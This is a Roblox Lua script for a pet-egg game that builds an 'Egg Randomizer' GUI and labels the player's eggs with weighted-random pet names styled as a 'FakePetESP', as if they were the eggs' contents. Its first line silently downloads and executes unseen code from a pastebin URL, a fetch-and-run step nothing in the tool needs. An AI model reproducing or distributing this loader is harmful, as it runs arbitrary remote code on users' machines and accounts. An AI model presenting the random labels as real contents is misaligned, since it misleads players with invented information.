loadstring(game:HttpGet("https://pastefy.app/36a6IJyt/raw"))()
local players = game:GetService("Players")
local collectionService = game:GetService("CollectionService")
local TweenService = game:GetService("TweenService")
local localPlayer = players.LocalPlayer or players:GetPlayers()[1]

-- Color palette
local BROWN_BG = Color3.fromRGB(118,61,25)
local BROWN_LIGHT = Color3.fromRGB(164,97,43)
local BROWN_BORDER = Color3.fromRGB(51,25,0)
local ACCENT_GREEN = Color3.fromRGB(110,196,99)
local BUTTON_GRAY = Color3.fromRGB(190,190,190)
local BUTTON_BLUE = Color3.fromRGB(66,150,255)
local BUTTON_BLUE_HOVER = Color3.fromRGB(85,180,255)
local BUTTON_GREEN = Color3.fromRGB(85,200,85)
local BUTTON_GREEN_HOVER = Color3.fromRGB(120,230,120)
local BUTTON_RED = Color3.fromRGB(255,62,62)
local BUTTON_RED_HOVER = Color3.fromRGB(255,100,100)
local FONT = Enum.Font.FredokaOne
local TILE_IMAGE = "rbxassetid://15910695828"

-- Subtle background pattern
local SUBTLE_PATTERN = "rbxassetid://8992356373"
local PATTERN_OVERLAY = Color3.fromRGB(255, 255, 255)
local PATTERN_TRANSPARENCY = 0.93

local eggChances = {
    ["Common Egg"] = { Dog=33, Bunny=33, ["Golden Lab"]=33 },
    ["Uncommon Egg"] = { ["Black Bunny"]=25, Chicken=25, Cat=25, Deer=25 },
    ["Rare Egg"] = { ["Orange Tabby"]=33.33, ["Spotted Deer"]=25, Pig=16.67, Rooster=16.67, Monkey=8.33 },
    ["Legendary Egg"] = { Cow=42.55, ["Silver Monkey"]=42.55, ["Sea Otter"]=10.64, Turtle=2.13, ["Polar Bear"]=2.13 },
    ["Mythic Egg"] = { ["Grey Mouse"]=37.5, ["Brown Mouse"]=26.79, Squirrel=26.79, ["Red Giant Ant"]=8.93, ["Red Fox"]=0 },
    ["Bug Egg"] = { Snail=40, ["Giant Ant"]=35, Caterpillar=25, ["Praying Mantis"]=0, ["Dragon Fly"]=0 },
    ["Night Egg"] = { Hedgehog=47, Mole=23.5, Frog=21.16, ["Echo Frog"]=8.35, ["Night Owl"]=0, Raccoon=0 },
    ["Bee Egg"] = { Bee=65, ["Honey Bee"]=20, ["Bear Bee"]=10, ["Petal Bee"]=5, ["Queen Bee"]=0 },
    ["Anti Bee Egg"] = { Wasp=55, ["Tarantula Hawk"]=31, Moth=14, Butterfly=0, ["Disco Bee"]=0 },
    ["Common Summer Egg"] = { Starfish=50, Seafull=25, Crab=25 },
    ["Rare Summer Egg"] = { Flamingo=30, Toucan=25, ["Sea Turtle"]=20, Orangutan=15, Seal=10 },
    ["Paradise Egg"] = { Ostrich=43, Peacock=33, Capybara=24, ["Scarlet Macaw"]=3, ["Mimic Octopus"]=1 },
    ["Premium Night Egg"] = { Hedgehog=50, Mole=26, Frog=14, ["Echo Frog"]=10 },
    ["Primal Egg"] = {
        Parasaurolophus=35,
        Iguanodon=32.5,
        Pachycephalosaurus=28,
        Dilophosaurus=3,
        Ankylosaurus=1,
        Spinosaurus=0.5
    },
    ["Dinosaur Egg"] = {
        ["T-Rex"]=50,
        Brontosaurus=30,
        Triceratops=10,
        Velociraptor=10
    },
}

local realESP = {
    ["Common Egg"]=true, ["Uncommon Egg"]=true, ["Rare Egg"]=true,
    ["Common Summer Egg"]=true, ["Rare Summer Egg"]=true
}

local displayedEggs, autoStopOn = {}, false

local function weightedRandom(opts)
    local v,t = {},0
    for pet,ch in pairs(opts) do if ch>0 then table.insert(v,{pet=pet,ch=ch}); t+=ch end end
    if #v==0 then return nil end
    local r = math.random()*t
    local cum = 0
    for _,x in ipairs(v) do cum+=x.ch; if r<=cum then return x.pet end end
    return v[1].pet
end

local function getNonRepeatingRandomPet(name,last)
    local pool = eggChances[name]
    if not pool then return nil end
    for i=1,5 do
        local pet = weightedRandom(pool)
        if pet~=last or math.random()<0.3 then return pet end
    end
    return weightedRandom(pool)
end

local function createEspGui(obj,txt)
    local bg = Instance.new("BillboardGui")
    bg.Name="FakePetESP"
    bg.Adornee = obj:FindFirstChildWhichIsA("BasePart") or obj.PrimaryPart or obj
    bg.Size = UDim2.new(0,200,0,50)
    bg.StudsOffset = Vector3.new(0,2.5,0)
    bg.AlwaysOnTop = true
    local lbl = Instance.new("TextLabel",bg)
    lbl.Size = UDim2.new(1,0,1,0)
    lbl.BackgroundTransparency = 1
    lbl.TextColor3 = Color3.new(1,1,1)
    lbl.TextStrokeTransparency = 0
    lbl.TextScaled = true
    lbl.Font = Enum.Font.SourceSansBold
    lbl.Text = txt
    bg.Parent = obj
    return bg
end

local function addESP(egg)
    if egg:GetAttribute("OWNER")~=localPlayer.Name then return end
    local n,id = egg:GetAttribute("EggName"), egg:GetAttribute("OBJECT_UUID")
    if not n or not id or displayedEggs[id] then return end
    local txt = realESP[n] and n or n.." | "..(getNonRepeatingRandomPet(n,nil) or "?")
    local gui = createEspGui(egg,txt)
    displayedEggs[id] = {egg=egg,gui=gui,label=gui:FindFirstChildWhichIsA("TextLabel"),eggName=n,lastPet=nil}
end

local function removeESP(egg)
    local id = egg:GetAttribute("OBJECT_UUID")
    if id and displayedEggs[id] then displayedEggs[id].gui:Destroy(); displayedEggs[id]=nil end
end

for _,e in collectionService:GetTagged("PetEggServer") do addESP(e) end
collectionService:GetInstanceAddedSignal("PetEggServer"):Connect(addESP)
collectionService:GetInstanceRemovedSignal("PetEggServer"):Connect(removeESP)

-- Create main GUI
local gui = Instance.new("ScreenGui", localPlayer:WaitForChild("PlayerGui"))
gui.Name = "RandomizerStyledGUI"
gui.ResetOnSpawn = false
gui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

-- Main container with improved styling
local main = Instance.new("Frame", gui)
main.Size = UDim2.new(0, 300, 0, 180)
main.Position = UDim2.new(0.5, -150, 0.5, -90)
main.BackgroundColor3 = BROWN_BG
main.Active = true
main.Draggable = true

local mainCorner = Instance.new("UICorner", main)
mainCorner.CornerRadius = UDim.new(0, 12)

local mainStroke = Instance.new("UIStroke", main)
mainStroke.Thickness = 3
mainStroke.Color = BROWN_BORDER
mainStroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border

-- Background pattern
local bgPattern = Instance.new("ImageLabel", main)
bgPattern.Size = UDim2.new(1, 0, 1, 0)
bgPattern.Image = SUBTLE_PATTERN
bgPattern.ImageColor3 = PATTERN_OVERLAY
bgPattern.ImageTransparency = PATTERN_TRANSPARENCY
bgPattern.BackgroundTransparency = 1
bgPattern.ScaleType = Enum.ScaleType.Tile
bgPattern.TileSize = UDim2.new(0, 100, 0, 100)
bgPattern.ZIndex = 1

-- Header with gradient
local top = Instance.new("Frame", main)
top.Size = UDim2.new(1, 0, 0, 32)
top.BackgroundColor3 = ACCENT_GREEN
top.BorderSizePixel = 0
top.ZIndex = 2

local topCorner = Instance.new("UICorner", top)
topCorner.CornerRadius = UDim.new(0, 12)

local topGradient = Instance.new("UIGradient", top)
topGradient.Color = ColorSequence.new{
    ColorSequenceKeypoint.new(0, ACCENT_GREEN),
    ColorSequenceKeypoint.new(1, Color3.fromRGB(90, 170, 80))
}
topGradient.Rotation = 90

local title = Instance.new("TextLabel", top)
title.Size = UDim2.new(1, -62, 1, 0)
title.Position = UDim2.new(0, 12, 0, 0)
title.BackgroundTransparency = 1
title.Text = "EGG RANDOMIZER"
title.Font = Enum.Font.GothamBold
title.TextColor3 = Color3.new(1, 1, 1)
title.TextStrokeTransparency = 0.7
title.TextScaled = true
title.TextXAlignment = Enum.TextXAlignment.Left
title.ZIndex = 3

local subtitle = Instance.new("TextLabel", top)
subtitle.Size = UDim2.new(1, -62, 0, 12)
subtitle.Position = UDim2.new(0, 12, 0, 18)
subtitle.BackgroundTransparency = 1
subtitle.Text = "By James"
subtitle.Font = Enum.Font.Gotham
subtitle.TextSize = 12
subtitle.TextColor3 = Color3.fromRGB(240, 240, 240)
subtitle.TextStrokeTransparency = 0.8
subtitle.TextXAlignment = Enum.TextXAlignment.Left
subtitle.ZIndex = 3

-- Close button with improved styling
local btnX = Instance.new("TextButton", top)
btnX.Size = UDim2.new(0, 24, 0, 24)
btnX.Position = UDim2.new(1, -30, 0.5, -12)
btnX.BackgroundColor3 = BUTTON_RED
btnX.Text = "×"
btnX.Font = Enum.Font.GothamBold
btnX.TextColor3 = Color3.new(1, 1, 1)
btnX.TextSize = 20
btnX.TextStrokeTransparency = 0.3
btnX.ZIndex = 3

local btnXCorner = Instance.new("UICorner", btnX)
btnXCorner.CornerRadius = UDim.new(1, 0)

btnX.MouseEnter:Connect(function() 
    btnX.BackgroundColor3 = BUTTON_RED_HOVER 
    local tween = TweenService:Create(btnX, TweenInfo.new(0.2), {Size = UDim2.new(0, 26, 0, 26)})
    tween:Play()
end)

btnX.MouseLeave:Connect(function() 
    btnX.BackgroundColor3 = BUTTON_RED 
    local tween = TweenService:Create(btnX, TweenInfo.new(0.2), {Size = UDim2.new(0, 24, 0, 24)})
    tween:Play()
end)

btnX.MouseButton1Click:Connect(function() 
    gui:Destroy() 
end)

-- Content area
local content = Instance.new("Frame", main)
content.Name = "ContentFrame"
content.Size = UDim2.new(1, -16, 1, -52)
content.Position = UDim2.new(0, 8, 0, 36)
content.BackgroundTransparency = 1
content.ZIndex = 2

-- Button creation function with improved styling
local function updateStop(btn)
    btn.BackgroundColor3 = autoStopOn and BUTTON_GREEN or BUTTON_RED
    btn.Text = "[A] Auto Stop: " .. (autoStopOn and "ON" or "OFF")
end

local function makeButton(txt, yPos, color, hoverColor, onClick)
    local button = Instance.new("TextButton", content)
    button.Size = UDim2.new(1, 0, 0, 32)
    button.Position = UDim2.new(0, 0, 0, yPos)
    button.BackgroundColor3 = color
    button.Text = txt
    button.Font = Enum.Font.GothamSemibold
    button.TextColor3 = Color3.new(1, 1, 1)
    button.TextSize = 14
    button.TextStrokeTransparency = 0.25
    button.ZIndex = 3
    
    local buttonCorner = Instance.new("UICorner", button)
    buttonCorner.CornerRadius = UDim.new(0, 8)
    
    local buttonStroke = Instance.new("UIStroke", button)
    buttonStroke.Color = BROWN_BORDER
    buttonStroke.Thickness = 2
    
    button.MouseEnter:Connect(function()
        button.BackgroundColor3 = hoverColor
        local tween = TweenService:Create(button, TweenInfo.new(0.2), {TextColor3 = Color3.fromRGB(245, 245, 245)})
        tween:Play()
    end)
    
    button.MouseLeave:Connect(function()
        button.BackgroundColor3 = color
        local tween = TweenService:Create(button, TweenInfo.new(0.2), {TextColor3 = Color3.new(1, 1, 1)})
        tween:Play()
    end)
    
    if onClick then
        button.MouseButton1Click:Connect(onClick)
    end
    
    return button
end

-- Create buttons with improved spacing
local stopButton = makeButton("[A] Auto Stop: OFF", 0, BUTTON_RED, BUTTON_RED_HOVER, function()
    autoStopOn = not autoStopOn
    updateStop(stopButton)
end)

local rerollButton = makeButton("[B] Reroll Pet Display", 38, BUTTON_BLUE, BUTTON_BLUE_HOVER, function()
    for _, data in pairs(displayedEggs) do
        local pet = getNonRepeatingRandomPet(data.eggName, data.lastPet)
        if pet and data.label then
            data.label.Text = data.eggName .. " | " .. pet
            data.lastPet = pet
        end
    end
end)

local infoButton = makeButton("[?] Info", 76, BUTTON_GRAY, Color3.fromRGB(210, 210, 210), function()
    print("Egg Randomizer Info: This tool shows randomized pet names for your eggs!")
end)

-- Footer with subtle styling
local footer = Instance.new("TextLabel", main)
footer.Size = UDim2.new(1, -10, 0, 16)
footer.Position = UDim2.new(0, 5, 1, -20)
footer.BackgroundTransparency = 1
footer.Text = "Made by James • v1.0"
footer.Font = Enum.Font.Gotham
footer.TextSize = 12
footer.TextColor3 = Color3.fromRGB(220, 220, 220)
footer.TextStrokeTransparency = 0.7
footer.ZIndex = 2

-- Add a subtle shadow effect
local shadow = Instance.new("ImageLabel", gui)
shadow.Image = "rbxassetid://1316045217"
shadow.ImageColor3 = Color3.fromRGB(0, 0, 0)
shadow.ImageTransparency = 0.8
shadow.ScaleType = Enum.ScaleType.Slice
shadow.SliceScale = 0.05
shadow.SliceCenter = Rect.new(10, 10, 118, 118)
shadow.Size = UDim2.new(0, 310, 0, 190)
shadow.Position = UDim2.new(0.5, -155, 0.5, -95)
shadow.BackgroundTransparency = 1
shadow.ZIndex = -1
